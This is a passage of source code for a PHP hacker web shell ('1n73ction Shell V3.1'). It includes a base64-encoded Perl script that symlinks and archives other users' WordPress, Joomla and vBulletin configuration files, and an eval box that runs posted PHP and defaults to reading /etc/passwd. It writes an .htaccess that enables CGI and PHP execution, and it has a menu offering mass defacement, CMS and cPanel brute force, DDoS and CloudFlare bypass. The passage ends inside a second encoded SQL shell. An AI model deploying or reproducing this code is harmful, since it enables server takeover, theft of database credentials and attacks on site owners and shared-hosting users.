aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7\'; \r\n?>\r\n<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>\r\n<script type="text/javascript">\r\nfunction tukar(lama,baru){\r\n\tdocument.getElementById(lama).style.display = \'none\';\r\n\tdocument.getElementById(baru).style.display = \'block\';\r\n}\r\n</script>\r\n<style type="text/css">\r\nbody{\r\n\tbackground:#000000;;\r\n}\r\na {\r\ntext-decoration:none;\r\n}\r\na:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n*{\r\n\tfont-size:11px;\r\n\tfont-family:Tahoma,Verdana,Arial;\r\n\tcolor:#00ff00;\r\n}\r\n#menu{\r\n\tbackground:#111111;\r\n\tmargin:8px 2px 4px 2px;\r\n}\r\n#menu a{\r\n\tpadding:4px 18px;\r\n\tmargin:0;\r\n\tbackground:#222222;\r\n\ttext-decoration:none;\r\n\tletter-spacing:2px;\r\n\t-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;\r\n}\r\n#menu a:hover{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\n\tborder-top:1px solid #333333;\r\n}\r\n.tabnet{\r\n\tmargin:15px auto 0 auto;\r\n\tborder: 1px solid #333333;\r\n}\r\n.main {\r\n\twidth:100%;\r\n}\r\n.gaya {\r\n\tcolor: #00ff00;\r\n}\r\n.inputz{\r\n\tbackground:#111111;\r\n\tborder:0;\r\n\tpadding:2px;\r\n\tborder-bottom:1px solid #222222;\r\n\tborder-top:1px solid #222222;\r\n}\r\n.inputzbut{\r\n\tbackground:#111111;\r\n\tcolor:#00ff00;\r\n\tmargin:0 4px;\r\n\tborder:1px solid #444444;\r\n\r\n}\r\n.inputz:hover, .inputzbut:hover{\r\n\tborder-bottom:1px solid #00ff00;\r\n\tborder-top:1px solid #00ff00;\r\n}\r\n.output {\r\n\tmargin:auto;\r\n\tborder:1px solid #00ff00;\r\n\twidth:100%;\r\n\theight:400px;\r\n\tbackground:#000000;\r\n\tpadding:0 2px;\r\n}\r\n.cmdbox{\r\n\twidth:100%;\r\n}\r\n.head_info{\r\n\tpadding: 0 4px;\r\n}\r\n.jaya{ font-family: ;}\r\n\r\n.b374k{\r\n\tfont-size:30px;\r\n\tpadding:0;\r\n\tcolor:#444444;\r\n}\r\n.b374k_tbl{\r\n\ttext-align:center;\r\n\tmargin:0 4px 0 0;\r\n\tpadding:0 4px 0 0;\r\n\tborder-right:1px solid #333333;\r\n}\r\n.phpinfo table{\r\n\twidth:100%;\r\n\tpadding:0 0 0 0;\r\n}\r\n.phpinfo td{\r\n\tbackground:#111111;\r\n\tcolor:#cccccc;\r\npadding:6px 8px;;\r\n}\r\n.phpinfo th, th{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\nfont-weight:normal;\r\n}\r\n.phpinfo h2, .phpinfo h2 a{\r\n\ttext-align:center;\r\n\tfont-size:16px;\r\n\tpadding:0;\r\n\tmargin:30px 0 0 0;\r\n\tbackground:#222222;\r\n\tpadding:4px 0;\r\n}\r\n.explore{\r\nwidth:100%;\r\n}\r\n.explore a {\r\ntext-decoration:none;\r\n}\r\n.explore td{\r\nborder-bottom:1px solid #333333;\r\npadding:0 8px;\r\nline-height:24px;\r\n}\r\n.explore th{\r\npadding:3px 8px;\r\nfont-weight:normal;\r\n}\r\n.explore th:hover , .phpinfo th:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n.explore tr:hover{\r\nbackground:#111111;\r\n}\r\n.viewfile{\r\nbackground:#EDECEB;\r\ncolor:#000000;\r\nmargin:4px 2px;\r\npadding:8px;\r\n}\r\n.sembunyi{\r\ndisplay:none;\r\npadding:0;margin:0;\r\n}\r\n\r\n</style></head>\r\n<script language=\'javascript\'>\r\nif (document.all||document.getElementById){\r\nvar thetitle=document.title\r\ndocument.title=\'\'\r\n}\r\nvar data="Us3 Y0ur br41n biTch ! ! !";\r\nvar done=1;\r\nfunction statusIn(text){\r\ndecrypt(text,22,22);\r\n}\r\nfunction statusOut(){\r\nself.status=\'\';\r\ndone=1;\r\n}\r\nfunction decrypt(text, max, delay){\r\nif (done){\r\ndone = 0;\r\nrantit(text, max, delay, 0, max);\r\n} \r\n}\r\nfunction rantit(text, runs_left, delay, charvar, max){\r\nif (!done){\r\nruns_left = runs_left - 1;\r\nvar status = text.substring(0,charvar);\r\nfor(var current_char = charvar; current_char < text.length; current_char++){\r\nstatus += data.charAt(Math.round(Math.random()*data.length));\r\n}\r\ndocument.title = status;\r\nvar rerun = "rantit(\'" + text + "\'," + runs_left + "," + delay + "," + charvar + "," + max + ");"\r\nvar new_char = charvar + 1;\r\nvar next_char = "rantit(\'" + text + "\'," + max + "," + delay + "," + new_char + "," + max + ");"\r\nif(runs_left > 0){\r\nsetTimeout(rerun, delay);\r\n}\r\nelse{\r\nif (charvar < text.length){\r\nsetTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));\r\n}\r\nelse\r\n{\r\ndone = 1;\r\n}\r\n}\r\n}\r\n}\r\nif (document.all||document.getElementById)\r\nstatusIn(thetitle)\r\n</script>\r\n\r\n<body onLoad="document.getElementById(\'cmd\').focus();">\r\n<div class="main">\r\n<!-- head info start here -->\r\n<div class="head_info">\r\n<table ><tr>\r\n<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>\r\n<td><?php echo $buff; ?></td>\r\n</tr></table>\r\n</div>\r\n<!-- head info end here -->\r\n<!-- menu start -->\r\n<center><div id="menu">\r\n<a href="?<?php echo "y=".$pwd; ?>"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=\' height="18" width="34"></a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tutor">Tutorial & Ebook</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>\r\n<a href="?<?php echo "y=".$pwd;\t?>&amp;x=logout">Log-Out</a>\r\n\r\n\r\n</div></center>\r\n<!-- menu end -->\r\n\r\n<?php\r\n@ini_set(\'display_errors\', 0);\r\nif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="cmd" id="cmd">\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo eval(magicboom($_POST[\'cmd\']));\r\n}\r\nelse echo "echo file_get_contents(\'/etc/passwd\');";\r\n?>\r\n</textarea>\r\n<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>\r\n</table>\r\n</form>\r\n\r\n<?php } \r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sql\'))\r\n    {\r\n    ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";\r\n  mkdir(\'mysql\', 0755);\r\n    chdir(\'mysql\');\r\n        $akses = ".htaccess";\r\n        $buka_lah = "$akses";\r\n        $buka = fopen ($buka_lah , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-php .cpc\r\n";    \r\n        fwrite ( $buka , $metin ) ;\r\n        fclose ($buka);\r\n$sqlshell = \'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7